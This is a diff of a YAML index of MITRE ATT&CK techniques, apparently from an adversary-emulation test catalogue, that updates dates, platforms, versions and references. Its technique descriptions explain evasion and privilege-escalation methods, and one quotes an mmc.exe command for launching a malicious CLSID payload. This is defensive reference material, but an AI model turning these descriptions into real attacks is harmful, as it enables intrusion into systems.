       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13844,13 +14130,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13909,11 +14194,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13953,8 +14237,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -13962,13 +14248,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -13999,9 +14285,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -14062,7 +14345,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14084,11 +14367,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14155,8 +14437,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14174,7 +14456,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14277,12 +14558,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14295,6 +14575,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14331,17 +14612,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14387,9 +14668,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14427,7 +14705,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14446,7 +14724,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14477,7 +14754,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14501,12 +14778,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14590,7 +14865,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14612,7 +14886,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14646,12 +14920,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14703,9 +14975,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14774,7 +15045,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14821,7 +15091,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14834,12 +15104,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -14918,7 +15189,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14940,7 +15211,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -14983,7 +15253,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15007,8 +15277,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15056,7 +15324,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15094,8 +15362,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15144,7 +15410,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15196,29 +15462,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15265,7 +15530,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15297,8 +15562,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15312,6 +15577,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15324,11 +15593,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15394,7 +15666,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15483,7 +15754,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15571,7 +15841,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15656,7 +15925,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15688,7 +15956,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15711,11 +15979,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15773,9 +16040,8 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests:
     - name: ListCronjobs
@@ -15849,7 +16115,7 @@ privilege-escalation:
         elevation_required: false
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15950,7 +16216,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15981,7 +16246,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16015,13 +16280,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16040,7 +16303,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -16054,7 +16316,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -16081,8 +16342,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16113,12 +16374,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16190,9 +16452,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
